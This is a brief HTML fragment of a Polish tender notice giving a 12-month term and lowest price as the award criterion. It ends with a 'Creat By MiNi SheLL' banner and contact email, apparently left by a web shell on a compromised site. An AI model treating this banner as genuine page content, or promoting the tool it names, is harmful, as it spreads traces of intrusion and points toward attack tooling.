<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com